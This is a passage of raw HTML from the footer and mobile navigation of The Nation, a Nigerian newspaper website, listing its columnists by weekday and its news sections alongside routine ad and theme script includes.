Delta","second_title":"","url":"http:\/\/thenationonlineng.net\/category\/niger-delta-3\/","header_type":"heading_6","header_background":"","header_secondary_background":"","header_text_color":"","header_line_color":"","header_accent_color":"","header_filter_category":"","header_filter_author":"","header_filter_tag":"","header_filter_text":"All","post_type":"post","content_type":"all","number_post":"6","post_offset":"0","unique_content":"disable","include_post":"","exclude_post":"","include_category":"26901","exclude_category":"","include_author":"","include_tag":"","exclude_tag":"","sort_by":"latest","date_format":"custom","date_format_custom":"","pagination_mode":"disable","pagination_nextprev_showtext":"","pagination_number_post":4,"pagination_scroll_limit":0,"boxed":"","boxed_shadow":"","el_id":"","el_class":"","scheme":"","column_width":"auto","title_color":"","accent_color":"","alt_color":"","excerpt_color":"","css":"","compatible_column_notice":"","paged":1,"column_class":"jeg_col_1o3","class":"jnews_block_24"};</script> </div></div></div></div></div> </div> </div> <div class="jeg_ad jnews_above_footer_ads "><div class='ads-wrapper '><div class='ads_code'><script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script> <ins class="adsbygoogle" style="display:inline-block;width:728px;height:90px" data-ad-client="ca-pub-5089981496810613" data-ad-slot="6482008575"></ins> <script> (adsbygoogle = window.adsbygoogle || []).push({}); </script></div></div></div> </div> </div> <div class="footer-holder" id="footer" data-id="footer"> <div class="jeg_footer jeg_footer_2 dark"> <div class="jeg_footer_container jeg_container"> <div class="jeg_footer_content"> <div class="container"> <div class="row"> <div class="jeg_footer_primary clearfix"> <div class="col-lg-4 col-md-3 footer_column"> <div class="footer_widget widget_nav_menu" id="nav_menu-10"><div class="jeg_footer_heading jeg_footer_heading_1"><h3 class="jeg_footer_title"><span>Popular </span></h3></div><div class="menu-popular-container"><ul id="menu-popular" class="menu"><li id="menu-item-918964" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-918964"><a href="https://thenationonlineng.net/category/business/">Business</a></li> <li id="menu-item-918965" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-918965"><a href="https://thenationonlineng.net/category/politics/">Politics</a></li> <li id="menu-item-918966" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-918966"><a href="https://thenationonlineng.net/category/city-beats/">City Beats</a></li> <li id="menu-item-918967" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-918967"><a href="https://thenationonlineng.net/category/education-news-nigeria/">Education</a></li> <li id="menu-item-918968" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-918968"><a href="https://thenationonlineng.net/category/sports2/sports-news/">Sports</a></li> <li id="menu-item-918969" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-918969"><a href="https://thenationonlineng.net/category/agric/">Agric</a></li> <li id="menu-item-918970" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-918970"><a href="https://thenationonlineng.net/category/arts-life/">Arts &#038; Life</a></li> <li id="menu-item-918971" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-918971"><a href="https://thenationonlineng.net/category/business/">Business</a></li> <li id="menu-item-918972" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-918972"><a href="https://thenationonlineng.net/category/editorials/">Editorial</a></li> <li id="menu-item-918973" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-918973"><a href="https://thenationonlineng.net/category/fashion-2/">Fashion</a></li> <li id="menu-item-918974" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-918974"><a href="https://thenationonlineng.net/category/commentaries/opinion/">Opinion</a></li> <li id="menu-item-918975" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-918975"><a href="https://thenationonlineng.net/category/saturday-magazine/weekend-treat/top-relationship-tips-advice/">Relationships</a></li> </ul></div></div> </div> <div class="col-md-3 footer_column"> <div class="footer_widget widget_nav_menu" id="nav_menu-3"><div class="jeg_footer_heading jeg_footer_heading_1"><h3 class="jeg_footer_title"><span>Monday</span></h3></div><div class="menu-col-monday-container"><ul id="menu-col-monday" class="menu"><li id="menu-item-872813" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-872813"><a href="https://thenationonlineng.net/category/sam-omatseye/">Sam Omatseye</a></li> <li id="menu-item-872814" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-872814"><a href="https://thenationonlineng.net/category/soji-omotunde/">Soji Omotunde</a></li> <li id="menu-item-872815" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-872815"><a href="https://thenationonlineng.net/category/emeka-omeihe/">Emeka Omeihe</a></li> <li id="menu-item-872816" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-872816"><a href="https://thenationonlineng.net/category/columnists/monday/femi-macaulay/">Femi Macaulay</a></li> </ul></div></div><div class="footer_widget widget_nav_menu" id="nav_menu-4"><div class="jeg_footer_heading jeg_footer_heading_1"><h3 class="jeg_footer_title"><span>Tuesday</span></h3></div><div class="menu-col-tuesday-container"><ul id="menu-col-tuesday" class="menu"><li id="menu-item-872817" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-872817"><a href="https://thenationonlineng.net/category/olatunji-dare/">Olatunji Dare</a></li> <li id="menu-item-872818" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-872818"><a href="https://thenationonlineng.net/category/olakunle-abimbola/">Olakunle Abimbola</a></li> <li id="menu-item-872819" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-872819"><a href="https://thenationonlineng.net/category/sanya-oni/">Sanya Oni</a></li> </ul></div></div><div class="footer_widget widget_nav_menu" id="nav_menu-5"><div class="jeg_footer_heading jeg_footer_heading_1"><h3 class="jeg_footer_title"><span>Wednesday</span></h3></div><div class="menu-col-wednesday-container"><ul id="menu-col-wednesday" class="menu"><li id="menu-item-872820" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-872820"><a href="https://thenationonlineng.net/category/dele-agekameh/">Dele Agekameh</a></li> <li id="menu-item-872821" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-872821"><a href="https://thenationonlineng.net/category/tony-marinho/">Tony Marinho</a></li> <li id="menu-item-872823" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-872823"><a href="https://thenationonlineng.net/category/louis-odion/">Louis Odion</a></li> </ul></div></div> </div> <div class="col-lg-2 col-md-3 footer_column"> <div class="footer_widget widget_nav_menu" id="nav_menu-6"><div class="jeg_footer_heading jeg_footer_heading_1"><h3 class="jeg_footer_title"><span>Thursday </span></h3></div><div class="menu-col-thursday-container"><ul id="menu-col-thursday" class="menu"><li id="menu-item-872824" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-872824"><a href="https://thenationonlineng.net/category/dapo-fafowora/">Dapo Fafowora</a></li> <li id="menu-item-872825" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-872825"><a href="https://thenationonlineng.net/category/gbenga-omotoso/">Gbenga Omotoso</a></li> <li id="menu-item-872826" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-872826"><a href="https://thenationonlineng.net/category/columnists/thursday/banji-akintoye/">Banji Akintoye</a></li> <li id="menu-item-872827" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-872827"><a href="https://thenationonlineng.net/category/jide-oluwajuyitan/">Jide Oluwajuyitan</a></li> <li id="menu-item-872828" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-872828"><a href="https://thenationonlineng.net/category/jide-osuntokun/">Jide Osuntokun</a></li> <li id="menu-item-872829" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-872829"><a href="https://thenationonlineng.net/category/lawal-ogienagbon/">Lawal Ogienagbon</a></li> </ul></div></div><div class="footer_widget widget_nav_menu" id="nav_menu-7"><div class="jeg_footer_heading jeg_footer_heading_1"><h3 class="jeg_footer_title"><span>Friday</span></h3></div><div class="menu-col-friday-container"><ul id="menu-col-friday" class="menu"><li id="menu-item-872830" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-872830"><a href="https://thenationonlineng.net/category/femi-abbas/">Femi Abbas</a></li> <li id="menu-item-934891" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-934891"><a href="https://thenationonlineng.net/category/columnists/korede-yishau/">Korede Yishau</a></li> <li id="menu-item-872831" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-872831"><a href="https://thenationonlineng.net/category/segun-gbadegesin/">Segun Gbadegesin</a></li> <li id="menu-item-872832" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-872832"><a href="https://thenationonlineng.net/category/steve-osuji/">Steve Osuji</a></li> <li id="menu-item-872833" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-872833"><a href="https://thenationonlineng.net/category/olatunji-ololade/">Olatunji Ololade</a></li> </ul></div></div> </div> <div class="col-md-3 footer_column"> <div class="footer_widget widget_nav_menu" id="nav_menu-8"><div class="jeg_footer_heading jeg_footer_heading_1"><h3 class="jeg_footer_title"><span>Saturday </span></h3></div><div class="menu-col-saturday-container"><ul id="menu-col-saturday" class="menu"><li id="menu-item-872835" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-872835"><a href="https://thenationonlineng.net/category/ade-ojeikere/">Ade Ojeikere</a></li> <li id="menu-item-872836" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-872836"><a href="https://thenationonlineng.net/category/dayo-sobowale/">Dayo Sobowale</a></li> <li id="menu-item-872837" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-872837"><a href="https://thenationonlineng.net/category/segun-ayobolu/">Segun Ayobolu</a></li> <li id="menu-item-872838" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-872838"><a href="https://thenationonlineng.net/category/victor-akande/">Victor Akande</a></li> <li id="menu-item-872840" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-872840"><a href="https://thenationonlineng.net/category/yomi-odunuga/">Yomi Odunuga</a></li> <li id="menu-item-872841" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-872841"><a href="https://thenationonlineng.net/category/columnists/under-tow-saturday/">UnderTow</a></li> <li id="menu-item-971487" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-971487"><a href="https://thenationonlineng.net/category/columnists/saturday/sentry/">Sentry</a></li> </ul></div></div><div class="footer_widget widget_nav_menu" id="nav_menu-9"><div class="jeg_footer_heading jeg_footer_heading_1"><h3 class="jeg_footer_title"><span>Sunday</span></h3></div><div class="menu-col-sunday-container"><ul id="menu-col-sunday" class="menu"><li id="menu-item-872842" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-872842"><a href="https://thenationonlineng.net/category/tatalo-alamu/">Tatalo Alamu</a></li> <li id="menu-item-872843" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-872843"><a href="https://thenationonlineng.net/category/idowu-akinlotan/">Idowu Akinlotan</a></li> <li id="menu-item-872844" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-872844"><a href="https://thenationonlineng.net/category/festus-eriye/">Festus Eriye</a></li> <li id="menu-item-872845" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-872845"><a href="https://thenationonlineng.net/category/tunji-adegboyega/">Tunji Adegboyega</a></li> <li id="menu-item-872846" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-872846"><a href="https://thenationonlineng.net/category/biodun-jeyifo/">Biodun Jeyifo</a></li> <li id="menu-item-872847" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-872847"><a href="https://thenationonlineng.net/category/ropo-sekoni/">Ropo Sekoni</a></li> <li id="menu-item-872848" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-872848"><a href="https://thenationonlineng.net/category/femi-orebe/">Femi Orebe</a></li> <li id="menu-item-872849" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-872849"><a href="https://thenationonlineng.net/category/lekan-otufodunrin/">Lekan Otufodunrin</a></li> <li id="menu-item-872850" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-872850"><a href="https://thenationonlineng.net/category/niyi-osundare/">Niyi Osundare</a></li> <li id="menu-item-872851" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-872851"><a href="https://thenationonlineng.net/category/columnists/oyinkan-medubi/">Oyinkan Medubi</a></li> <li id="menu-item-872852" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-872852"><a href="https://thenationonlineng.net/category/barometer/">Barometer</a></li> </ul></div></div> </div> </div> </div> <div class="jeg_footer_secondary clearfix"> <div class="footer_right"> <div class="jeg_social_icon_block socials_widget nobg"> <a href="https://www.facebook.com/thenationng/" target='_blank' class="jeg_facebook"><i class="fa fa-facebook"></i> </a><a href="https://twitter.com/TheNationNews" target='_blank' class="jeg_twitter"><i class="fa fa-twitter"></i> </a><a href="https://www.instagram.com/thenationnewspaper/" target='_blank' class="jeg_instagram"><i class="fa fa-instagram"></i> </a> </div> </div> <p class="copyright"> Copyright © 2018, All Rights Reserved. Vintage Press Limited. Optimized by <a href="http://inerd360.com">iNERD360</a> </p> </div> </div> </div> </div> </div> </div> <div class="jscroll-to-top"> <a href="#back-to-top" class="jscroll-to-top_link"><i class="fa fa-angle-up"></i></a> </div> </div> <div id="jeg_off_canvas" class="normal"> <a href="#" class="jeg_menu_close"><i class="jegicon-cross"></i></a> <div class="jeg_bg_overlay"></div> <div class="jeg_mobile_wrapper"> <div class="nav_wrap"> <div class="item_main"> <div class="jeg_aside_item jeg_search_wrapper jeg_search_no_expand round"> <a href="#" class="jeg_search_toggle"><i class="fa fa-search"></i></a> <form action="https://thenationonlineng.net/" method="get" class="jeg_search_form" target="_top"> <input name="s" class="jeg_search_input" placeholder="Search..." type="text" value="" autocomplete="off"> <button type="submit" class="jeg_search_button btn"><i class="fa fa-search"></i></button> </form> <div class="jeg_search_result jeg_search_hide with_result"> <div class="search-result-wrapper"> </div> <div class="search-link search-noresult"> No Result </div> <div class="search-link search-all-button"> <i class="fa fa-search"></i> View All Result </div> </div></div><div class="jeg_aside_item"> <ul class="jeg_mobile_menu"><li class="menu-item menu-item-type-custom menu-item-object-custom current-menu-item current_page_item menu-item-home menu-item-919890"><a href="https://thenationonlineng.net/" aria-current="page">Home</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-124"><a href="https://thenationonlineng.net/category/news/">News</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-126"><a href="https://thenationonlineng.net/category/politics/">Politics</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-652781"><a href="https://thenationonlineng.net/category/columnists/">Columnists</a> <ul class="sub-menu"> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-652784"><a href="https://thenationonlineng.net/category/columnists/monday/">Monday</a> <ul class="sub-menu"> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-652795"><a href="https://thenationonlineng.net/category/sam-omatseye/">Sam Omatseye</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-652793"><a href="https://thenationonlineng.net/category/emeka-omeihe/">Emeka Omeihe</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-652794"><a href="https://thenationonlineng.net/category/columnists/monday/femi-macaulay/">Femi Macaulay</a></li> </ul> </li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-652788"><a href="https://thenationonlineng.net/category/columnists/tuesday/">Tuesday</a> <ul class="sub-menu"> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-919509"><a href="https://thenationonlineng.net/category/columnists/gabriel-amalu/">Gabriel Amalu</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-652802"><a href="https://thenationonlineng.net/category/olatunji-dare/">Olatunji Dare</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-652801"><a href="https://thenationonlineng.net/category/olakunle-abimbola/">Olakunle Abimbola</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-652803"><a href="https://thenationonlineng.net/category/sanya-oni/">Sanya Oni</a></li> </ul> </li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-652789"><a href="https://thenationonlineng.net/category/columnists/wednesday/">Wednesday</a> <ul class="sub-menu"> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-652830"><a href="https://thenationonlineng.net/category/dele-agekameh/">Dele Agekameh</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-652811"><a href="https://thenationonlineng.net/category/tony-marinho/">Tony Marinho</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-652832"><a href="https://thenationonlineng.net/category/louis-odion/">Louis Odion</a></li> </ul> </li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-652787"><a href="https://thenationonlineng.net/category/columnists/thursday/">Thursday</a> <ul class="sub-menu"> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-652816"><a href="https://thenationonlineng.net/category/gbenga-omotoso/">Gbenga Omotoso</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-652817"><a href="https://thenationonlineng.net/category/jide-oluwajuyitan/">Jide Oluwajuyitan</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-652818"><a href="https://thenationonlineng.net/category/jide-osuntokun/">Jide Osuntokun</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-652819"><a href="https://thenationonlineng.net/category/lawal-ogienagbon/">Lawal Ogienagbon</a></li> </ul> </li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-652791"><a href="https://thenationonlineng.net/category/columnists/friday/">Friday</a> <ul class="sub-menu"> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-652823"><a href="https://thenationonlineng.net/category/femi-abbas/">Femi Abbas</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-934888"><a href="https://thenationonlineng.net/category/columnists/korede-yishau/">Korede Yishau</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-652826"><a href="https://thenationonlineng.net/category/segun-gbadegesin/">Segun Gbadegesin</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-652827"><a href="https://thenationonlineng.net/category/steve-osuji/">Steve Osuji</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-652825"><a href="https://thenationonlineng.net/category/olatunji-ololade/">Olatunji Ololade</a></li> </ul> </li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-652790"><a href="https://thenationonlineng.net/category/columnists/saturday/">Saturday</a> <ul class="sub-menu"> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-652837"><a href="https://thenationonlineng.net/category/ade-ojeikere/">Ade Ojeikere</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-652838"><a href="https://thenationonlineng.net/category/dayo-sobowale/">Dayo Sobowale</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-652840"><a href="https://thenationonlineng.net/category/segun-ayobolu/">Segun Ayobolu</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-652835"><a href="https://thenationonlineng.net/category/victor-akande/">Victor Akande</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-652836"><a href="https://thenationonlineng.net/category/yomi-odunuga/">Yomi Odunuga</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-656186"><a href="https://thenationonlineng.net/category/columnists/under-tow-saturday/">UnderTow</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-971488"><a href="https://thenationonlineng.net/category/columnists/saturday/sentry/">Sentry</a></li> </ul> </li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-652786"><a href="https://thenationonlineng.net/category/columnists/sunday/">Sunday</a> <ul class="sub-menu"> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-652849"><a href="https://thenationonlineng.net/category/tatalo-alamu/">Tatalo Alamu</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-652858"><a href="https://thenationonlineng.net/category/idowu-akinlotan/">Idowu Akinlotan</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-652857"><a href="https://thenationonlineng.net/category/festus-eriye/">Festus Eriye</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-652850"><a href="https://thenationonlineng.net/category/tunji-adegboyega/">Tunji Adegboyega</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-652844"><a href="https://thenationonlineng.net/category/biodun-jeyifo/">Biodun Jeyifo</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-652854"><a href="https://thenationonlineng.net/category/ropo-sekoni/">Ropo Sekoni</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-652856"><a href="https://thenationonlineng.net/category/femi-orebe/">Femi Orebe</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-652859"><a href="https://thenationonlineng.net/category/lekan-otufodunrin/">Lekan Otufodunrin</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-666302"><a href="https://thenationonlineng.net/category/niyi-osundare/">Niyi Osundare</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-652867"><a href="https://thenationonlineng.net/category/columnists/oyinkan-medubi/">Oyinkan Medubi</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-738756"><a href="https://thenationonlineng.net/category/barometer/">Barometer</a></li> </ul> </li> </ul> </li> <li class="business-wrap-cls menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-74"><a href="https://thenationonlineng.net/category/business/">Business</a> <ul class="sub-menu"> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-652399"><a href="https://thenationonlineng.net/category/business/latest-agriculture-news/">Agriculture</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-652400"><a href="https://thenationonlineng.net/category/business/aviation/">Aviation</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-652401"><a href="https://thenationonlineng.net/category/business/brand-week/">Brand week</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-652402"><a href="https://thenationonlineng.net/category/business/building-properties/">Building &#038; Properties</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-652403"><a href="https://thenationonlineng.net/category/business/capital-market-updates/">Capital Market</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-652404"><a href="https://thenationonlineng.net/category/business/ceo/">CEO</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-590754"><a href="https://thenationonlineng.net/category/business/e-business/">e-Business</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-652406"><a href="https://thenationonlineng.net/category/business/energy/">Energy</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-719017"><a href="https://thenationonlineng.net/category/business/money/">Money</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-652407"><a href="https://thenationonlineng.net/category/business/equities/">Equities</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-652408"><a href="https://thenationonlineng.net/category/business/export-digest/">Export Digest</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-696414"><a href="https://thenationonlineng.net/category/business/transportation-business/">Transportation</a></li> </ul> </li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-403663"><a href="https://thenationonlineng.net/category/editorials/">Editorial</a> <ul class="sub-menu"> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-689830"><a href="https://thenationonlineng.net/category/comments/">Comments</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-403666"><a href="https://thenationonlineng.net/category/commentaries/hardball/">Hardball</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-658423"><a href="https://thenationonlineng.net/category/commentaries/opinion/">Opinion</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-403665"><a href="https://thenationonlineng.net/category/commentaries/cartoon/">Cartoon</a></li> </ul> </li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-403620"><a href="https://thenationonlineng.net/category/sports2/sports-news/">Sports</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-403662"><a href="https://thenationonlineng.net/category/health/">Health</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-403618"><a href="https://thenationonlineng.net/category/entertainment/">Entertainment</a> <ul class="sub-menu"> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-403667"><a href="https://thenationonlineng.net/category/entertainment/entertainment-3/celebrity/">Celebrity</a></li> </ul> </li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-403621"><a href="https://thenationonlineng.net/category/arts-life/life-the-midweek-magazine/">Magazine</a> <ul class="sub-menu"> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-652415"><a href="https://thenationonlineng.net/category/niger-delta-3/">Niger Delta</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-652414"><a href="https://thenationonlineng.net/category/northern-report/">Northern Report</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-652418"><a href="https://thenationonlineng.net/category/southeast-2/">SouthEast</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-652419"><a href="https://thenationonlineng.net/category/southwest/">Southwest</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-652422"><a href="https://thenationonlineng.net/category/saturday-magazine/crime-diary/">Crime Diary</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-652416"><a href="https://thenationonlineng.net/category/family-health/">Family Health</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-652417"><a href="https://thenationonlineng.net/category/saturday-magazine/fashion/">Fashion</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-652409"><a href="https://thenationonlineng.net/category/saturday-magazine/">Saturday Magazine</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-652410"><a href="https://thenationonlineng.net/category/sunday-magazine/">Sunday magazine</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-652420"><a href="https://thenationonlineng.net/category/saturday-magazine/weekend-treat/">Weekend Treat</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-652421"><a href="https://thenationonlineng.net/category/sunday-magazine/worship/">Worship</a></li> </ul> </li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-403619"><a href="https://thenationonlineng.net/category/education-news-nigeria/">Education</a> <ul class="sub-menu"> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-403664"><a href="https://thenationonlineng.net/category/nigeria-universities-breaking-news/">Campus Life</a></li> </ul> </li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-652398"><a href="https://thenationonlineng.net/category/online-special/">Online Special</a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-1037022"><a href="http://community.thenationonlineng.net/forum/">Forum</a></li> </ul></div> </div> <div class="item_bottom"> <div class="jeg_aside_item socials_widget nobg"> <a href="https://www.facebook.com/thenationng/" target='_blank' class="jeg_facebook"><i class="fa fa-facebook"></i> </a><a href="https://twitter.com/TheNationNews" target='_blank' class="jeg_twitter"><i class="fa fa-twitter"></i> </a><a href="https://www.instagram.com/thenationnewspaper/" target='_blank' class="jeg_instagram"><i class="fa fa-instagram"></i> </a></div><div class="jeg_aside_item jeg_aside_copyright"> <p>Copyright © 2018, All Rights Reserved. Vintage Press Limited. Optimized by <a href="http://inerd360.com">iNERD360</a> </p> </div> </div> </div> </div> </div><script type="text/javascript">var jfla = []</script><link rel='stylesheet' id='prettyphoto-css' href='https://thenationonlineng.net/wp-content/plugins/js_composer/assets/lib/prettyphoto/css/prettyPhoto.min.css?ver=5.7' type='text/css' media='all' /> <link rel='stylesheet' id='vc_pageable_owl-carousel-css-css' href='https://thenationonlineng.net/wp-content/plugins/js_composer/assets/lib/owl-carousel2-dist/assets/owl.min.css?ver=5.7' type='text/css' media='all' /> <link rel='stylesheet' id='animate-css-css' href='https://thenationonlineng.net/wp-content/plugins/js_composer/assets/lib/bower/animate-css/animate.min.css?ver=5.7' type='text/css' media='all' /> <script type='text/javascript'> /* <![CDATA[ */ var countVars = {"disqusShortname":"thenationonline"}; /* ]]> */ </script> <script type='text/javascript' src='https://thenationonlineng.net/wp-content/plugins/disqus-comment-system/public/js/comment_count.js?ver=3.0.17'></script> <script type='text/javascript' src='https://thenationonlineng.net/wp-includes/js/comment-reply.min.js?ver=5.2'></script> <script type='text/javascript' src='https://thenationonlineng.net/wp-includes/js/mediaelement/wp-mediaelement.min.js?ver=5.2'></script> <script type='text/javascript' src='https://thenationonlineng.net/wp-includes/js/hoverIntent.min.js?ver=1.8.1'></script> <script type='text/javascript' src='https://thenationonlineng.net/wp-includes/js/imagesloaded.min.js?ver=3.2.0'></script> <script type='text/javascript'> /* <![CDATA[ */ var jnewsoption = {"popup_script":"magnific","single_gallery":"","ismobile":"","isie":"","sidefeed_ajax":"","lang":"en_US","module_prefix":"jnews_module_ajax_","live_search":"1","postid":"0","isblog":"","admin_bar":"0","follow_video":"1","follow_position":"top_right","rtl":"0","gif":""}; /* ]]> */ </script> <script type='text/javascript' src='https://thenationonlineng.net/wp-content/themes/jnews/assets/dist/frontend.min.js?ver=4.0.7'></script> <!--[if lt IE 9]> <script type='text/javascript' src='https://thenationonlineng.net/wp-content/themes/jnews/assets/js/html5shiv.min.js?ver=4.0.7'></script> 